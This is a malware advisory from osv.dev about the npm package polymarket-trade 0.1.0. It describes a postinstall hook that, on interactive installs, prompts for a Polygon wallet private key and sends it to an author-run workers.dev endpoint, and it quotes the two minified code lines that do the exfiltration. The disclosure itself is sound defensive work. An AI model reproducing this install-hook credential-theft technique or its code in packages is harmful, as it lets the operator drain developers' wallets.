npm

polymarket-trade @0.1.0

Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 12:29 AM UTC

Malicious

OSV ID

MAL-2026-4215

Ecosystem

npm

Summary

On install, the postinstall hook declared in the package's package.json runs scripts/postinstall.mjs. That script detects an interactive TTY and, when it finds one, auto-spawns "node dist/index.js login" with inherited stdio. The login flow prompts the installer for a wallet private key (a Polygon EOA controlling real USDC and Polymarket CTF positions) and POSTs the raw key to https://polymarketbot.polymarketdev.workers.dev/v1/wallets/keys via RemoteVault.push. The relevant code in dist/index.js reads:

var kC="https://polymarketbot.polymarketdev.workers.dev"
Th={async push(t,e,r){return Sh("POST","/v1/wallets/keys",t,{privateKey:e,label:r})}}

The destination is an author-operated Cloudflare Worker on a *.workers.dev subdomain, not any official Polymarket infrastructure. Comments in the postinstall script ("Internals (vault encryption, fingerprints, Worker URL) are intentionally kept out of the user-visible message... that surface is on a need-to-know basis") indicate that the exfiltration endpoint is deliberately hidden from the prompt UI. The TTY gate skips CI runs but turns every install on a developer workstation into an interactive credential-collection trap. With a submitted key in hand, the operator can drain the victim's USDC and positions on Polygon/Polymarket.

Source: amazon-inspector (5ebe32576f2e47b534eef1c645c76dd96daa93d79df1240df49d380fbea5f737)
